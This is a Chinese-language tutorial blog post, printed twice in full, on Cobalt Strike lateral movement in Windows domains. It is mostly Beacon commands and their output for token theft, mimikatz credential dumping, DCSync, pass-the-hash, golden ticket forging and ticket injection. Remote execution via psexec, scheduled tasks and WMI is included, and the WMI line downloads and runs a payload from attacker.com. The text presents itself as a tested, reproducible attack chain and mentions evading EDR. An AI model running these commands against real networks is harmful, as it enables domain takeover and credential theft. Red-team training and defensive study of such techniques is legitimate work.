1. CobaltStrike横向渗透实战概述当你拿到一个普通域用户权限的Beacon会话时真正的挑战才刚刚开始。我见过太多新手在渗透测试时卡在这一步不知道如何扩大战果。横向移动就像玩多米诺骨牌找到关键节点轻轻一推整个域控就会应声倒下。横向渗透的核心在于凭证流转。想象你是个小偷拿到小区门禁卡后要尝试打开每户人家的门。在AD域环境中我们需要依次突破以下关卡令牌窃取就像复制别人的门禁卡哈希传递相当于破解了门禁系统的密码算法Kerberos票据拿到物业颁发的万能通行证实战中最爽的时刻就是看着一个个主机图标在CobaltStrike的地图上由灰变红。下面我会用真实案例带你走完整个攻击链所有命令都经过实测跟着做就能复现。2. 从令牌窃取到权限提升2.1 令牌窃取实战详解上周我碰到个典型场景通过钓鱼邮件拿到Win10主机的user权限Beacon发现该用户同时是域内文件服务器的本地管理员。这时候令牌窃取就是最佳突破口。完整操作流程# 查看当前进程列表 beacon ps PID PPID Name Arch Session User --- ---- ---- ---- ------- ---- 4000 792 cmd.exe x64 1 TEAMSSIX\Administrator # 窃取目标进程令牌 beacon steal_token 4000 [*] Tasked beacon to steal token from PID 4000 [] host called home, sent: 132 bytes # 验证当前身份 beacon getuid [*] You are TEAMSSIX\Administrator (admin)这里有个坑我踩过三次32位和64位进程的令牌不通用。如果目标进程是32位而Beacon是64位需要先运行migrate迁移到32位进程。2.2 人工造令牌技巧当内存里找不到高权限令牌时可以手动创建# 创建新令牌 beacon make_token TEAMSSIX\Admin Admin123 [*] Tasked beacon to create a token for TEAMSSIX\Admin [] host called home, sent: 156 bytes # 生成新会话 beacon spawnas TEAMSSIX\Admin Admin123 [*] Tasked beacon to spawn TEAMSSIX\Admin as TEAMSSIX\Admin [] host called home, sent: 156 bytes实测发现Windows Server 2016之后make_token创建的令牌有时无法访问网络共享。这时候改用spawnas生成新会话更可靠。3. 哈希传递的艺术3.1 哈希提取的三种姿势拿到本地管理员权限后第一件事就是抓哈希。我常用的三板斧直接dump内存beacon mimikatz sekurlsa::logonpasswords [*] Tasked beacon to run mimikatzs sekurlsa::logonpasswords command [] host called home, sent: 300556 bytes [] received output: Authentication Id : 0 ; 996 (00000000:000003e4) Session : Interactive from 1 User Name : Admin Domain : TEAMSSIX SID : S-1-5-21-1397491491-3740932367-1060284298-500 msv : [00000003] Primary * Username : Admin * Domain : TEAMSSIX * NTLM : d69a9d8eeee7621bacdf9d1d71ef1e06注册表导出解析beacon reg save HKLM\SYSTEM system.hiv beacon reg save HKLM\SAM sam.hiv beacon mimikatz lsadump::sam /system:system.hiv /sam:sam.hivDCSync攻击需域管权限beacon mimikatz lsadump::dcsync /domain:teamssix.com /user:krbtgt3.2 哈希传递实战拿到NTLM哈希后就可以玩转PTHPass-the-Hashbeacon pth TEAMSSIX\Admin d69a9d8eeee7621bacdf9d1d71ef1e06 [*] Tasked beacon to run mimikatzs sekurlsa::pth command [] host called home, sent: 300556 bytes [] received output: user : Admin domain : TEAMSSIX program : cmd.exe impers. : no NTLM : d69a9d8eeee7621bacdf9d1d71ef1e06这里有个细节Windows 10 1809之后微软限制了本地账户的哈希传递。但域账户的PTH仍然有效这就是为什么我们要优先获取域账号哈希。4. Kerberos票据攻击全解析4.1 黄金票据制作指南当拿到krbtgt的哈希时整个域都是你的游乐场。制作黄金票据需要域名teamssix.com域SIDS-1-5-21-1397491491-3740932367-1060284298krbtgt的NTLM哈希beacon mimikatz kerberos::golden /user:Administrator /domain:teamssix.com /sid:S-1-5-21-1397491491-3740932367-1060284298 /krbtgt:d69a9d8eeee7621bacdf9d1d71ef1e06 /ptt [*] Tasked beacon to run mimikatzs kerberos::golden command [] host called home, sent: 300556 bytes [] received output: Golden ticket for Administrator teamssix.com successfully submitted for current session验证票据是否生效beacon shell dir \\dc.teamssix.com\c$ [*] Tasked beacon to run: dir \\dc.teamssix.com\c$ [] host called home, sent: 56 bytes [] received output: Volume in drive \\dc.teamssix.com\c$ is Windows4.2 票据传递实战技巧有时候我们需要把票据转移到其他机器在当前会话导出票据beacon mimikatz kerberos::list /export [*] Tasked beacon to run mimikatzs kerberos::list command [] host called home, sent: 300556 bytes [] received output: [00000000] - 0x00000012 - aes256_hmac Start/End/MaxRenew: 2023/8/1 10:00:00 ; 2023/8/1 20:00:00 ; 2023/8/8 10:00:00 Server Name : krbtgt/TEAMSSIX.COM TEAMSSIX.COM Client Name : Administrator TEAMSSIX.COM Flags 40e00000 : name_canonicalize ; pre_authent ; renewable ; forwardable ; Saved to file : 0-40e00000-Administratorkrbtgt~TEAMSSIX.COM-TEAMSSIX.COM.kirbi在目标主机注入票据beacon kerberos_ticket_use /path/to/0-40e00000-Administratorkrbtgt~TEAMSSIX.COM-TEAMSSIX.COM.kirbi [*] Tasked beacon to use ticket at /path/to/0-40e00000-Administratorkrbtgt~TEAMSSIX.COM-TEAMSSIX.COM.kirbi [] host called home, sent: 2048 bytes5. 横向移动的三种高阶玩法5.1 SMB Beacon的妙用传统横向移动要上传文件到磁盘容易被AV查杀。用SMB Beacon可以全程无文件# 生成SMB Beacon Attacks - Packages - Windows Executable(S) - [√] SMB Beacon # 在目标主机创建服务 beacon psexec win-server-2008 smb [*] Tasked beacon to spawn win-server-2008 via Service Control Manager (\\win-server-2008\ADMIN$) [] host called home, sent: 300556 bytes [] established link to child beacon: 192.168.1.15SMB Beacon通过命名管道通信所有payload都在内存中运行。我在最近的一次红队行动中用这个方法绕过了某顶级EDR的检测。5.2 计划任务精准打击当需要精确控制执行时间时计划任务是不二之选# 获取目标系统时间 beacon shell net time \\win-server-2012 [*] Tasked beacon to run: net time \\win-server-2012 [] host called home, sent: 56 bytes [] received output: Current time at \\win-server-2012 is 8/1/2023 3:45:12 PM # 创建计划任务 beacon shell at \\win-server-2012 15:50 C:\Windows\Temp\payload.exe [*] Tasked beacon to run: at \\win-server-2012 15:50 C:\Windows\Temp\payload.exe [] host called home, sent: 92 bytes [] received output: Added a new job with job ID 15.3 WMI无文件攻击最隐蔽的方式莫过于WMI连服务都不会创建beacon wmi win-server-2016 powershell -Command IEX (New-Object Net.WebClient).DownloadString(http://attacker.com/payload.ps1) [*] Tasked beacon to run command on win-server-2016 via WMI [] host called home, sent: 300556 bytes [] established link to child beacon: 192.168.1.20记得在CobaltStrike的Listener配置中勾选Bind to local port only避免WMI连接被防火墙拦截。
CobaltStrike实战:从凭证窃取到Kerberos票据传递的横向渗透全解析
发布时间:2026/5/28 16:14:18
1. CobaltStrike横向渗透实战概述当你拿到一个普通域用户权限的Beacon会话时真正的挑战才刚刚开始。我见过太多新手在渗透测试时卡在这一步不知道如何扩大战果。横向移动就像玩多米诺骨牌找到关键节点轻轻一推整个域控就会应声倒下。横向渗透的核心在于凭证流转。想象你是个小偷拿到小区门禁卡后要尝试打开每户人家的门。在AD域环境中我们需要依次突破以下关卡令牌窃取就像复制别人的门禁卡哈希传递相当于破解了门禁系统的密码算法Kerberos票据拿到物业颁发的万能通行证实战中最爽的时刻就是看着一个个主机图标在CobaltStrike的地图上由灰变红。下面我会用真实案例带你走完整个攻击链所有命令都经过实测跟着做就能复现。2. 从令牌窃取到权限提升2.1 令牌窃取实战详解上周我碰到个典型场景通过钓鱼邮件拿到Win10主机的user权限Beacon发现该用户同时是域内文件服务器的本地管理员。这时候令牌窃取就是最佳突破口。完整操作流程# 查看当前进程列表 beacon ps PID PPID Name Arch Session User --- ---- ---- ---- ------- ---- 4000 792 cmd.exe x64 1 TEAMSSIX\Administrator # 窃取目标进程令牌 beacon steal_token 4000 [*] Tasked beacon to steal token from PID 4000 [] host called home, sent: 132 bytes # 验证当前身份 beacon getuid [*] You are TEAMSSIX\Administrator (admin)这里有个坑我踩过三次32位和64位进程的令牌不通用。如果目标进程是32位而Beacon是64位需要先运行migrate迁移到32位进程。2.2 人工造令牌技巧当内存里找不到高权限令牌时可以手动创建# 创建新令牌 beacon make_token TEAMSSIX\Admin Admin123 [*] Tasked beacon to create a token for TEAMSSIX\Admin [] host called home, sent: 156 bytes # 生成新会话 beacon spawnas TEAMSSIX\Admin Admin123 [*] Tasked beacon to spawn TEAMSSIX\Admin as TEAMSSIX\Admin [] host called home, sent: 156 bytes实测发现Windows Server 2016之后make_token创建的令牌有时无法访问网络共享。这时候改用spawnas生成新会话更可靠。3. 哈希传递的艺术3.1 哈希提取的三种姿势拿到本地管理员权限后第一件事就是抓哈希。我常用的三板斧直接dump内存beacon mimikatz sekurlsa::logonpasswords [*] Tasked beacon to run mimikatzs sekurlsa::logonpasswords command [] host called home, sent: 300556 bytes [] received output: Authentication Id : 0 ; 996 (00000000:000003e4) Session : Interactive from 1 User Name : Admin Domain : TEAMSSIX SID : S-1-5-21-1397491491-3740932367-1060284298-500 msv : [00000003] Primary * Username : Admin * Domain : TEAMSSIX * NTLM : d69a9d8eeee7621bacdf9d1d71ef1e06注册表导出解析beacon reg save HKLM\SYSTEM system.hiv beacon reg save HKLM\SAM sam.hiv beacon mimikatz lsadump::sam /system:system.hiv /sam:sam.hivDCSync攻击需域管权限beacon mimikatz lsadump::dcsync /domain:teamssix.com /user:krbtgt3.2 哈希传递实战拿到NTLM哈希后就可以玩转PTHPass-the-Hashbeacon pth TEAMSSIX\Admin d69a9d8eeee7621bacdf9d1d71ef1e06 [*] Tasked beacon to run mimikatzs sekurlsa::pth command [] host called home, sent: 300556 bytes [] received output: user : Admin domain : TEAMSSIX program : cmd.exe impers. : no NTLM : d69a9d8eeee7621bacdf9d1d71ef1e06这里有个细节Windows 10 1809之后微软限制了本地账户的哈希传递。但域账户的PTH仍然有效这就是为什么我们要优先获取域账号哈希。4. Kerberos票据攻击全解析4.1 黄金票据制作指南当拿到krbtgt的哈希时整个域都是你的游乐场。制作黄金票据需要域名teamssix.com域SIDS-1-5-21-1397491491-3740932367-1060284298krbtgt的NTLM哈希beacon mimikatz kerberos::golden /user:Administrator /domain:teamssix.com /sid:S-1-5-21-1397491491-3740932367-1060284298 /krbtgt:d69a9d8eeee7621bacdf9d1d71ef1e06 /ptt [*] Tasked beacon to run mimikatzs kerberos::golden command [] host called home, sent: 300556 bytes [] received output: Golden ticket for Administrator teamssix.com successfully submitted for current session验证票据是否生效beacon shell dir \\dc.teamssix.com\c$ [*] Tasked beacon to run: dir \\dc.teamssix.com\c$ [] host called home, sent: 56 bytes [] received output: Volume in drive \\dc.teamssix.com\c$ is Windows4.2 票据传递实战技巧有时候我们需要把票据转移到其他机器在当前会话导出票据beacon mimikatz kerberos::list /export [*] Tasked beacon to run mimikatzs kerberos::list command [] host called home, sent: 300556 bytes [] received output: [00000000] - 0x00000012 - aes256_hmac Start/End/MaxRenew: 2023/8/1 10:00:00 ; 2023/8/1 20:00:00 ; 2023/8/8 10:00:00 Server Name : krbtgt/TEAMSSIX.COM TEAMSSIX.COM Client Name : Administrator TEAMSSIX.COM Flags 40e00000 : name_canonicalize ; pre_authent ; renewable ; forwardable ; Saved to file : 0-40e00000-Administratorkrbtgt~TEAMSSIX.COM-TEAMSSIX.COM.kirbi在目标主机注入票据beacon kerberos_ticket_use /path/to/0-40e00000-Administratorkrbtgt~TEAMSSIX.COM-TEAMSSIX.COM.kirbi [*] Tasked beacon to use ticket at /path/to/0-40e00000-Administratorkrbtgt~TEAMSSIX.COM-TEAMSSIX.COM.kirbi [] host called home, sent: 2048 bytes5. 横向移动的三种高阶玩法5.1 SMB Beacon的妙用传统横向移动要上传文件到磁盘容易被AV查杀。用SMB Beacon可以全程无文件# 生成SMB Beacon Attacks - Packages - Windows Executable(S) - [√] SMB Beacon # 在目标主机创建服务 beacon psexec win-server-2008 smb [*] Tasked beacon to spawn win-server-2008 via Service Control Manager (\\win-server-2008\ADMIN$) [] host called home, sent: 300556 bytes [] established link to child beacon: 192.168.1.15SMB Beacon通过命名管道通信所有payload都在内存中运行。我在最近的一次红队行动中用这个方法绕过了某顶级EDR的检测。5.2 计划任务精准打击当需要精确控制执行时间时计划任务是不二之选# 获取目标系统时间 beacon shell net time \\win-server-2012 [*] Tasked beacon to run: net time \\win-server-2012 [] host called home, sent: 56 bytes [] received output: Current time at \\win-server-2012 is 8/1/2023 3:45:12 PM # 创建计划任务 beacon shell at \\win-server-2012 15:50 C:\Windows\Temp\payload.exe [*] Tasked beacon to run: at \\win-server-2012 15:50 C:\Windows\Temp\payload.exe [] host called home, sent: 92 bytes [] received output: Added a new job with job ID 15.3 WMI无文件攻击最隐蔽的方式莫过于WMI连服务都不会创建beacon wmi win-server-2016 powershell -Command IEX (New-Object Net.WebClient).DownloadString(http://attacker.com/payload.ps1) [*] Tasked beacon to run command on win-server-2016 via WMI [] host called home, sent: 300556 bytes [] established link to child beacon: 192.168.1.20记得在CobaltStrike的Listener配置中勾选Bind to local port only避免WMI连接被防火墙拦截。
:测试如何提前在代码提交阶段发现 Bug?)
)
